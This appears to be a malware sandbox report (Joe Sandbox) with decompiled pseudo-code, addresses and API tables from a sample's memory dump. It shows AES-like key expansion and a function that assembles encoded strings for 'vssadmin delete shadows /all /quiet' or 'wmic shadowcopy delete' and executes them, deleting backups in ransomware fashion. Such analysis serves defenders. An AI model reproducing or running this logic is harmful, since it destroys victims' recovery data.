							_t585 =  *(0xf14aa40 + (_t843 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t736 & 0x000000ff) * 4) ^  *(0xf14a240 + (_t580 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t581 & 0x000000ff) * 4) ^ _t997[1];
							goto L5;
						} else {
							_t564 = 0xffffffff;
						}
					}
				}
				return _t564;
			}

0x0f141023
0x0f141027
0x0f14102b
0x0f14102f
0x0f141033
0x0f141042
0x0f141046
0x0f14104d
0x0f141050
0x0f141053
0x0f141056
0x0f14105f
0x0f1413c7
0x0f1413c7
0x0f1413ca
0x0f1413d3
0x0f141424
0x0f141426
0x0f14145b
0x0f14145e
0x0f14148b
0x0f14148d
0x0f14148f
0x0f141492
0x0f141495
0x0f141498
0x0f14149b
0x0f1414a4
0x0f1414f5
0x0f1414f7
0x0f14152c
0x0f14152f
0x0f14155c
0x0f14155e
0x0f141560
0x0f141563
0x0f141566
0x0f141569
0x0f14156c
0x0f141575
0x0f1415c6
0x0f1415c8
0x0f1415fd
0x0f141600
0x0f14162d
0x0f14162f
0x0f141631
0x0f141634
0x0f141637
0x0f14163a
0x0f14163d
0x0f141646
0x0f141697
0x0f141699
0x0f1416ce
0x0f1416d1
0x0f1416fe
0x0f141700
0x0f141702
0x0f141705
0x0f141708
0x0f14170b
0x0f14170e
0x0f141717
0x0f141768
0x0f14176a
0x0f14179f
0x0f1417a2
0x0f1417cf
0x0f1417d1
0x0f1417d3
0x0f1417d6
0x0f1417d9
0x0f1417dc
0x0f1417df
0x0f1417e8
0x0f141839
0x0f14183b
0x0f141870
0x0f141873
0x0f1418a0
0x0f1418a2
0x0f1418a4
0x0f1418a7
0x0f1418aa
0x0f1418ad
0x0f1418b0
0x0f1418b9
0x0f14190a
0x0f14190c
0x0f141941
0x0f141944
0x0f141971
0x0f141973
0x0f141975
0x0f141978
0x0f14197b
0x0f14197e
0x0f141981
0x0f14198a
0x0f1419db
0x0f1419dd
0x0f141a12
0x0f141a15
0x0f141a42
0x0f141a44
0x0f141a46
0x0f141a49
0x0f141a4c
0x0f141a4f
0x0f141a52
0x0f141a5b
0x0f141aac
0x0f141aae
0x0f141ae3
0x0f141ae6
0x0f141b13
0x0f141b15
0x0f141b17
0x0f141b1a
0x0f141b1d
0x0f141b20
0x0f141b23
0x0f141b2c
0x0f141b7d
0x0f141b7f
0x0f141bb4
0x0f141bb7
0x0f141be4
0x0f141bed
0x0f141bf1
0x0f141bf3
0x0f141bf6
0x0f141bf9
0x0f141bfc
0x0f141065
0x0f14106b
0x0f141225
0x0f141225
0x0f141228
0x0f141231
0x0f141282
0x0f141284
0x0f1412b9
0x0f1412bc
0x0f1412e9
0x0f1412eb
0x0f1412ed
0x0f1412f0
0x0f1412f3
0x0f1412f6
0x0f1412f9
0x0f141302
0x0f141353
0x0f141355
0x0f14138a
0x0f14138d
0x0f1413ba
0x0f1413bc
0x0f1413be
0x0f1413c1
0x0f1413c4
0x00000000
0x0f141071
0x0f141077
0x0f141083
0x0f141086
0x0f14108f
0x0f1410e0
0x0f1410e2
0x0f141117
0x0f14111a
0x0f141147
0x0f141149
0x0f14114b
0x0f14114e
0x0f141151
0x0f141154
0x0f141157
0x0f141160
0x0f1411b1
0x0f1411b3
0x0f1411e8
0x0f1411eb
0x0f141218
0x0f14121a
0x0f14121c
0x0f14121f
0x0f141222
0x00000000
0x0f141079
0x0f141079
0x0f141079
0x0f141077
0x0f14106b
0x0f141c11

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bbc7a5c72dc1fd630f7eaacb7a4e45cf94f83f9b324bfc52eb2702eeb99509f
Instruction ID: 188da16929a31eba7bfc059746d7fb916c86299394acc490117fc3560510b241
Opcode Fuzzy Hash: 5bbc7a5c72dc1fd630f7eaacb7a4e45cf94f83f9b324bfc52eb2702eeb99509f
Instruction Fuzzy Hash: F3622935C442788FEB80DF6EE48402673A2ABC4333B4B4536AA505B297D63C7579BB74

Uniqueness

Uniqueness Score: -1.00%

Function 0F148520 Relevance: .4, Instructions: 395
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0F148520(signed int _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr* _t274;
				signed int _t284;
				signed int _t287;
				unsigned int _t289;
				intOrPtr _t297;
				signed int _t306;
				signed int _t309;
				unsigned int _t311;
				intOrPtr _t319;
				signed int _t328;
				signed int _t331;
				unsigned int _t333;
				intOrPtr _t341;
				signed int _t350;
				signed int _t353;
				unsigned int _t355;
				intOrPtr _t363;
				signed int _t372;
				signed int _t375;
				unsigned int _t377;
				intOrPtr _t385;
				signed int _t394;
				signed int _t397;
				unsigned int _t399;
				intOrPtr _t407;
				signed int _t416;
				intOrPtr* _t420;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed char _t427;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t441;
				intOrPtr _t442;
				signed int _t458;
				intOrPtr _t459;
				signed int _t475;
				intOrPtr _t476;
				signed int _t492;
				intOrPtr _t493;
				signed int _t509;
				intOrPtr _t510;
				signed int _t526;
				intOrPtr _t527;
				signed int _t542;
				signed int _t543;
				signed int _t544;
				signed int _t545;
				signed int _t546;
				signed int _t547;
				signed int _t548;
				signed int _t549;
				signed int _t551;
				signed int _t553;
				signed int _t554;
				signed int _t555;
				signed int _t556;
				signed int _t557;
				signed int _t558;
				signed int _t559;
				signed int _t561;
				signed int _t562;
				signed int _t563;
				signed int _t564;
				signed int _t565;
				signed int _t566;
				signed int _t567;
				intOrPtr _t568;

				_t274 = _a4;
				_t420 = _a8;
				_t428 =  *_t274;
				_v12 = _t428;
				 *_t420 = _t428;
				_t429 =  *((intOrPtr*)(_t274 + 4));
				 *((intOrPtr*)(_t420 + 4)) = _t429;
				_v16 = _t429;
				_t430 =  *((intOrPtr*)(_t274 + 8));
				 *((intOrPtr*)(_t420 + 8)) = _t430;
				_v8 = _t430;
				_t431 =  *((intOrPtr*)(_t274 + 0xc));
				 *((intOrPtr*)(_t420 + 0xc)) = _t431;
				_t543 =  *(_t274 + 0x10);
				 *(_t420 + 0x10) = _t543;
				_t561 =  *(_t274 + 0x14);
				 *(_t420 + 0x14) = _t561;
				_a4 = _t431;
				_t553 =  *(_t274 + 0x18);
				 *(_t420 + 0x18) = _t553;
				_t421 =  *(_t274 + 0x1c);
				 *(_a8 + 0x1c) = _t421;
				_t284 = _v12 ^  *(0xf14ba40 + (_t421 >> 0x18) * 4) ^  *(0xf14b640 + (_t421 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf14b240 + (_t421 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf14be40 + (_t421 & 0x000000ff) * 4) ^  *0xf14a200;
				_v12 = _t284;
				 *(_a8 + 0x20) = _t284;
				_t441 = _v16 ^ _t284;
				_v16 = _t441;
				 *(_a8 + 0x24) = _t441;
				_t287 = _v8 ^ _t441;
				_t442 = _a8;
				_v8 = _t287;
				 *(_t442 + 0x28) = _t287;
				_t289 = _a4 ^ _v8;
				 *(_t442 + 0x2c) = _t289;
				_a4 = _t289;
				_t297 = _a8;
				_t544 = _t543 ^  *(0xf14be40 + (_t289 >> 0x18) * 4) ^  *(0xf14ba40 + (_t289 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf14b640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf14b240 + (_a4 & 0x000000ff) * 4);
				_t562 = _t561 ^ _t544;
				_t554 = _t553 ^ _t562;
				_t422 = _t421 ^ _t554;
				 *(_t297 + 0x30) = _t544;
				 *(_t297 + 0x34) = _t562;
				 *(_t297 + 0x38) = _t554;
				 *(_t297 + 0x3c) = _t422;
				_t306 = _v12 ^  *(0xf14ba40 + (_t422 >> 0x18) * 4) ^  *(0xf14b640 + (_t422 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf14b240 + (_t422 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf14be40 + (_t422 & 0x000000ff) * 4) ^  *0xf14a204;
				_v12 = _t306;
				 *(_a8 + 0x40) = _t306;
				_t458 = _v16 ^ _t306;
				_v16 = _t458;
				 *(_a8 + 0x44) = _t458;
				_t309 = _v8 ^ _t458;
				_t459 = _a8;
				_v8 = _t309;
				 *(_t459 + 0x48) = _t309;
				_t311 = _a4 ^ _v8;
				 *(_t459 + 0x4c) = _t311;
				_a4 = _t311;
				_t319 = _a8;
				_t545 = _t544 ^  *(0xf14be40 + (_t311 >> 0x18) * 4) ^  *(0xf14ba40 + (_t311 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf14b640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf14b240 + (_a4 & 0x000000ff) * 4);
				_t563 = _t562 ^ _t545;
				_t555 = _t554 ^ _t563;
				_t423 = _t422 ^ _t555;
				 *(_t319 + 0x50) = _t545;
				 *(_t319 + 0x54) = _t563;
				 *(_t319 + 0x58) = _t555;
				 *(_t319 + 0x5c) = _t423;
				_t328 = _v12 ^  *(0xf14ba40 + (_t423 >> 0x18) * 4) ^  *(0xf14b640 + (_t423 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf14b240 + (_t423 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf14be40 + (_t423 & 0x000000ff) * 4) ^  *0xf14a208;
				_v12 = _t328;
				 *(_a8 + 0x60) = _t328;
				_t475 = _v16 ^ _t328;
				_v16 = _t475;
				 *(_a8 + 0x64) = _t475;
				_t331 = _v8 ^ _t475;
				_t476 = _a8;
				_v8 = _t331;
				 *(_t476 + 0x68) = _t331;
				_t333 = _a4 ^ _v8;
				 *(_t476 + 0x6c) = _t333;
				_a4 = _t333;
				_t341 = _a8;
				_t546 = _t545 ^  *(0xf14be40 + (_t333 >> 0x18) * 4) ^  *(0xf14ba40 + (_t333 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf14b640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf14b240 + (_a4 & 0x000000ff) * 4);
				_t564 = _t563 ^ _t546;
				_t556 = _t555 ^ _t564;
				_t424 = _t423 ^ _t556;
				 *(_t341 + 0x70) = _t546;
				 *(_t341 + 0x74) = _t564;
				 *(_t341 + 0x78) = _t556;
				 *(_t341 + 0x7c) = _t424;
				_t350 = _v12 ^  *(0xf14ba40 + (_t424 >> 0x18) * 4) ^  *(0xf14b640 + (_t424 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf14b240 + (_t424 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf14be40 + (_t424 & 0x000000ff) * 4) ^  *0xf14a20c;
				_v12 = _t350;
				 *(_a8 + 0x80) = _t350;
				_t492 = _v16 ^ _t350;
				_v16 = _t492;
				 *(_a8 + 0x84) = _t492;
				_t353 = _v8 ^ _t492;
				_t493 = _a8;
				_v8 = _t353;
				 *(_t493 + 0x88) = _t353;
				_t355 = _a4 ^ _v8;
				 *(_t493 + 0x8c) = _t355;
				_a4 = _t355;
				_t363 = _a8;
				_t547 = _t546 ^  *(0xf14be40 + (_t355 >> 0x18) * 4) ^  *(0xf14ba40 + (_t355 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf14b640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf14b240 + (_a4 & 0x000000ff) * 4);
				_t565 = _t564 ^ _t547;
				_t557 = _t556 ^ _t565;
				 *(_t363 + 0x90) = _t547;
				 *(_t363 + 0x94) = _t565;
				 *(_t363 + 0x98) = _t557;
				_t425 = _t424 ^ _t557;
				 *(_t363 + 0x9c) = _t425;
				_t372 = _v12 ^  *(0xf14ba40 + (_t425 >> 0x18) * 4) ^  *(0xf14b640 + (_t425 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf14b240 + (_t425 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf14be40 + (_t425 & 0x000000ff) * 4) ^  *0xf14a210;
				_v12 = _t372;
				 *(_a8 + 0xa0) = _t372;
				_t509 = _v16 ^ _t372;
				_v16 = _t509;
				 *(_a8 + 0xa4) = _t509;
				_t375 = _v8 ^ _t509;
				_t510 = _a8;
				_v8 = _t375;
				 *(_t510 + 0xa8) = _t375;
				_t377 = _a4 ^ _v8;
				 *(_t510 + 0xac) = _t377;
				_a4 = _t377;
				_t385 = _a8;
				_t548 = _t547 ^  *(0xf14be40 + (_t377 >> 0x18) * 4) ^  *(0xf14ba40 + (_t377 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf14b640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf14b240 + (_a4 & 0x000000ff) * 4);
				_t566 = _t565 ^ _t548;
				_t558 = _t557 ^ _t566;
				_t426 = _t425 ^ _t558;
				 *(_t385 + 0xb0) = _t548;
				 *(_t385 + 0xb4) = _t566;
				 *(_t385 + 0xb8) = _t558;
				 *(_t385 + 0xbc) = _t426;
				_t394 = _v12 ^  *(0xf14ba40 + (_t426 >> 0x18) * 4) ^  *(0xf14b640 + (_t426 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf14b240 + (_t426 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf14be40 + (_t426 & 0x000000ff) * 4) ^  *0xf14a214;
				_v12 = _t394;
				 *(_a8 + 0xc0) = _t394;
				_t526 = _v16 ^ _t394;
				_v16 = _t526;
				 *(_a8 + 0xc4) = _t526;
				_t397 = _v8 ^ _t526;
				_t527 = _a8;
				_v8 = _t397;
				 *(_t527 + 0xc8) = _t397;
				_t399 = _a4 ^ _v8;
				 *(_t527 + 0xcc) = _t399;
				_a4 = _t399;
				_t407 = _a8;
				_t549 = _t548 ^  *(0xf14be40 + (_t399 >> 0x18) * 4) ^  *(0xf14ba40 + (_t399 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf14b640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf14b240 + (_a4 & 0x000000ff) * 4);
				_t567 = _t566 ^ _t549;
				_t559 = _t558 ^ _t567;
				_t427 = _t426 ^ _t559;
				 *(_t407 + 0xd4) = _t567;
				_t568 = _t407;
				 *(_t407 + 0xd0) = _t549;
				 *(_t568 + 0xd8) = _t559;
				 *(_t568 + 0xdc) = _t427;
				_t416 = _v12 ^  *(0xf14ba40 + (_t427 >> 0x18) * 4) ^  *(0xf14b640 + (_t427 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf14b240 + (_t427 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf14be40 + (_t427 & 0x000000ff) * 4) ^  *0xf14a218;
				 *((intOrPtr*)(_t568 + 0xf0)) = 0;
				_t542 = _v16 ^ _t416;
				 *(_t568 + 0xe0) = _t416;
				_t551 = _v8 ^ _t542;
				 *(_t568 + 0xe4) = _t542;
				 *(_t568 + 0xec) = _a4 ^ _t551;
				 *(_t568 + 0xe8) = _t551;
				 *((char*)(_t568 + 0xf0)) = 0xe0;
				return 0;
			}

0x0f148526
0x0f14852a
0x0f14852e
0x0f148530
0x0f148533
0x0f148535
0x0f148538
0x0f14853b
0x0f14853e
0x0f148541
0x0f148544
0x0f148547
0x0f14854a
0x0f14854d
0x0f148550
0x0f148553
0x0f148556
0x0f148559
0x0f14855d
0x0f148560
0x0f148563
0x0f14856e
0x0f1485a9
0x0f1485ae
0x0f1485b1
0x0f1485b7
0x0f1485bc
0x0f1485bf
0x0f1485c5
0x0f1485c7
0x0f1485ca
0x0f1485cd
0x0f1485d3
0x0f1485d6
0x0f1485db
0x0f148612
0x0f148615
0x0f148617
0x0f148619
0x0f14861b
0x0f14861d
0x0f148620
0x0f148623
0x0f148626
0x0f148666
0x0f14866b
0x0f14866e
0x0f148674
0x0f148679
0x0f14867c
0x0f148682
0x0f148684
0x0f148687
0x0f14868a
0x0f148690
0x0f148693
0x0f148698
0x0f1486cf
0x0f1486d2
0x0f1486d4
0x0f1486d6
0x0f1486d8
0x0f1486da
0x0f1486df
0x0f1486e2
0x0f1486e5
0x0f148723
0x0f148728
0x0f14872b
0x0f148731
0x0f148736
0x0f148739
0x0f14873f
0x0f148741
0x0f148744
0x0f148747
0x0f14874d
0x0f148750
0x0f148755
0x0f14878c
0x0f14878f
0x0f148791
0x0f148793
0x0f148795
0x0f148797
0x0f14879c
0x0f14879f
0x0f1487a2
0x0f1487e0
0x0f1487e5
0x0f1487e8
0x0f1487f1
0x0f1487f6
0x0f1487f9
0x0f148802
0x0f148804
0x0f148807
0x0f14880a
0x0f148813
0x0f148816
0x0f14881e
0x0f148855
0x0f148858
0x0f14885a
0x0f14885c
0x0f14885e
0x0f148864
0x0f14886a
0x0f148870
0x0f148872
0x0f1488b5
0x0f1488ba
0x0f1488bd
0x0f1488c6
0x0f1488cb
0x0f1488ce
0x0f1488d7
0x0f1488d9
0x0f1488dc
0x0f1488df
0x0f1488e8
0x0f1488eb
0x0f1488f3
0x0f14892a
0x0f14892d
0x0f14892f
0x0f148931
0x0f148933
0x0f148935
0x0f14893d
0x0f148943
0x0f148949
0x0f14898a
0x0f14898f
0x0f148992
0x0f14899b
0x0f1489a0
0x0f1489a3
0x0f1489ac
0x0f1489ae
0x0f1489b1
0x0f1489b4
0x0f1489bd
0x0f1489c0
0x0f1489c8
0x0f1489ff
0x0f148a02
0x0f148a04
0x0f148a06
0x0f148a08
0x0f148a0a
0x0f148a12
0x0f148a14
0x0f148a25
0x0f148a2b
0x0f148a65
0x0f148a67
0x0f148a74
0x0f148a76
0x0f148a7f
0x0f148a83
0x0f148a89
0x0f148a91
0x0f148a97
0x0f148aa3

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53d16e5e0eaf815bdecd4ede47716bff353f776d7f20817246c70662c366d878
Instruction ID: d4e2c282e63b95ef54edf7bc4759c524b2d907c4659d084e3ca53b0ed21d6480
Opcode Fuzzy Hash: 53d16e5e0eaf815bdecd4ede47716bff353f776d7f20817246c70662c366d878
Instruction Fuzzy Hash: 2212E874A141189FCB48CF29D49096ABBF1FB8D311B5280BEE90ADB382C734EA55DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0F145FF0 Relevance: .3, Instructions: 346COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 794c13284e084b999102786f7c7132ff237cb24c9401df5e3aaca089a4b1fbef
Instruction ID: 637e646404eb6cb80b8a736d514e822f0c95854a0e3dd1ef67768847e3690dbd
Opcode Fuzzy Hash: 794c13284e084b999102786f7c7132ff237cb24c9401df5e3aaca089a4b1fbef
Instruction Fuzzy Hash: 1BD19F71E002168FCB24CF58C890BAAF7B1FF8A718F694569D855AB342D335F961CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0F1445B0 Relevance: 78.8, APIs: 5, Strings: 40, Instructions: 99
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0F1445B0(void* __eflags) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char _v120;
				short _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				char _v152;
				short _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char _v172;
				short* _v176;
				short* _t51;
				WCHAR* _t59;
				void* _t62;
				signed int _t66;
				void* _t69;

				if(E0F143CF0(_t62) == 0) {
					_v172 = 0x63005c;
					_v168 = 0x64006d;
					_v8 = 0;
					_t59 =  &_v172;
					_v164 = 0x65002e;
					_t51 =  &_v84;
					_v160 = 0x650078;
					_v156 = 0;
					_v84 = 0x63002f;
					_v80 = 0x760020;
					_v76 = 0x730073;
					_v72 = 0x640061;
					_v68 = 0x69006d;
					_v64 = 0x20006e;
					_v60 = 0x650064;
					_v56 = 0x65006c;
					_v52 = 0x650074;
					_v48 = 0x730020;
					_v44 = 0x610068;
					_v40 = 0x6f0064;
					_v36 = 0x730077;
					_v32 = 0x2f0020;
					_v28 = 0x6c0061;
					_v24 = 0x20006c;
					_v20 = 0x71002f;
					_v16 = 0x690075;
					_v12 = 0x740065;
				} else {
					_v152 = 0x77005c;
					_v148 = 0x650062;
					_t59 =  &_v152;
					_v144 = 0x5c006d;
					_t51 =  &_v120;
					_v140 = 0x6d0077;
					_v136 = 0x630069;
					_v132 = 0x65002e;
					_v128 = 0x650078;
					_v124 = 0;
					_v120 = 0x680073;
					_v116 = 0x640061;
					_v112 = 0x77006f;
					_v108 = 0x6f0063;
					_v104 = 0x790070;
					_v100 = 0x640020;
					_v96 = 0x6c0065;
					_v92 = 0x740065;
					_v88 = 0x65;
				}
				_v176 = _t51;
				_t69 = VirtualAlloc(0, 0x400, 0x3000, 0x40);
				if(_t69 != 0) {
					GetSystemDirectoryW(_t69, 0x100);
					lstrcatW(_t69, _t59);
					ShellExecuteW(0, L"open", _t69, _v176, 0, 0);
					asm("sbb edi, edi");
					_t66 =  ~0x20;
				} else {
					_t66 = 0;
				}
				VirtualFree(_t69, 0, 0x8000);
				return _t66;
			}

0x0f1445c6
0x0f144662
0x0f14466c
0x0f144674
0x0f14467c
0x0f144680
0x0f144688
0x0f14468c
0x0f144694
0x0f144699
0x0f1446a1
0x0f1446a9
0x0f1446b1
0x0f1446b9
0x0f1446c1
0x0f1446c9
0x0f1446d4
0x0f1446df
0x0f1446ea
0x0f1446f5
0x0f144700
0x0f14470b
0x0f144716
0x0f144721
0x0f14472c
0x0f144737
0x0f144742
0x0f14474d
0x0f1445cc
0x0f1445ce
0x0f1445d6
0x0f1445de
0x0f1445e2
0x0f1445ea
0x0f1445ee
0x0f1445f6
0x0f1445fe
0x0f144606
0x0f14460e
0x0f144613
0x0f14461b
0x0f144623
0x0f14462b
0x0f144633
0x0f14463b
0x0f144643
0x0f14464b
0x0f144653
0x0f144653
0x0f144766
0x0f144775
0x0f144779
0x0f144785
0x0f14478d
0x0f1447a3
0x0f1447ab
0x0f1447ad
0x0f14477b
0x0f14477b
0x0f14477b
0x0f1447b7
0x0f1447c5

APIs

Part of subcall function 0F143CF0: _memset.LIBCMT ref: 0F143D42
Part of subcall function 0F143CF0: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0F143D66
Part of subcall function 0F143CF0: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0F143D6A
Part of subcall function 0F143CF0: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0F143D6E
Part of subcall function 0F143CF0: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0F143D95

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000040), ref: 0F14476F
GetSystemDirectoryW.KERNEL32(00000000,00000100), ref: 0F144785
lstrcatW.KERNEL32(00000000,0063005C), ref: 0F14478D
ShellExecuteW.SHELL32(00000000,open,00000000,?,00000000,00000000), ref: 0F1447A3
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F1447B7

Strings

d, xrefs: 0F144700
e, xrefs: 0F14474D
, xrefs: 0F1446EA
a, xrefs: 0F1446B1
l, xrefs: 0F14472C
a, xrefs: 0F14461B
\, xrefs: 0F144662
o, xrefs: 0F144623
., xrefs: 0F1445FE
x, xrefs: 0F14468C
t, xrefs: 0F1446DF
m, xrefs: 0F1446B9
e, xrefs: 0F14464B
a, xrefs: 0F144721
x, xrefs: 0F144606
p, xrefs: 0F144633
n, xrefs: 0F1446C1
, xrefs: 0F144716
d, xrefs: 0F1446C9
open, xrefs: 0F14479C
c, xrefs: 0F14462B
m, xrefs: 0F14466C
w, xrefs: 0F14470B
i, xrefs: 0F1445F6
m, xrefs: 0F1445E2
/, xrefs: 0F144737
b, xrefs: 0F1445D6
u, xrefs: 0F144742
/, xrefs: 0F144699
w, xrefs: 0F1445EE
e, xrefs: 0F144653
., xrefs: 0F144680
, xrefs: 0F1446A1
, xrefs: 0F14463B
h, xrefs: 0F1446F5
e, xrefs: 0F144643
l, xrefs: 0F1446D4
\, xrefs: 0F1445CE
s, xrefs: 0F144613
s, xrefs: 0F1446A9

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: ConditionMask$Virtual$AllocDirectoryExecuteFreeInfoShellSystemVerifyVersion_memsetlstrcat
String ID: $ $ $ $.$.$/$/$\$\$a$a$a$b$c$d$d$e$e$e$e$h$i$l$l$m$m$m$n$o$open$p$s$s$t$u$w$w$x$x
API String ID: 2684037697-4098772853
Opcode ID: 308ebe5118d6938eb52e0347aed5d2eeeeab581047423a7dc0fe77b5ff873d52
Instruction ID: c8e02011ff7e353556365ea2f1521415f340f839127f5dbb4bac394e62b91742
Opcode Fuzzy Hash: 308ebe5118d6938eb52e0347aed5d2eeeeab581047423a7dc0fe77b5ff873d52
Instruction Fuzzy Hash: AC4107B0148380DEE320CF119849B5BBEE6BFC5B59F10491CEA985A291C7F6958CCF97

Uniqueness

Uniqueness Score: -1.00%

Function 0F143DB0 Relevance: 77.1, APIs: 9, Strings: 35, Instructions: 109
memorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F143DB0(void* __ecx, void* __edx, void* __eflags) {
				char _v1020;
				short _v1028;
				char _v1532;
				short _v1540;
				intOrPtr _v1548;
				intOrPtr _v1552;
				intOrPtr _v1556;
				intOrPtr _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				intOrPtr _v1576;
				intOrPtr _v1580;
				intOrPtr _v1584;
				intOrPtr _v1588;
				intOrPtr _v1592;
				intOrPtr _v1596;
				intOrPtr _v1600;
				intOrPtr _v1604;
				intOrPtr _v1608;
				intOrPtr _v1612;
				intOrPtr _v1616;
				short _v1620;
				intOrPtr _v1624;
				intOrPtr _v1628;
				intOrPtr _v1632;
				intOrPtr _v1636;
				intOrPtr _v1640;
				intOrPtr _v1644;
				intOrPtr _v1648;
				intOrPtr _v1652;
				intOrPtr _v1656;
				intOrPtr _v1660;
				intOrPtr _v1664;
				intOrPtr _v1668;
				intOrPtr _v1672;
				short _v1676;
				char _v1680;
				int _t54;
				struct HWND__* _t62;
				long _t66;
				void* _t76;
				void* _t78;
				void* _t80;

				_t78 = __ecx;
				_t54 = E0F143CF0(__edx);
				if(_t54 != 0) {
					_t54 = E0F143C70();
					if(_t54 == 0) {
						_v1676 = 0x770025;
						_v1672 = 0x6e0069;
						_v1668 = 0x690064;
						_v1664 = 0x250072;
						_v1660 = 0x73005c;
						_v1656 = 0x730079;
						_v1652 = 0x650074;
						_v1648 = 0x33006d;
						_v1644 = 0x5c0032;
						_v1640 = 0x620077;
						_v1636 = 0x6d0065;
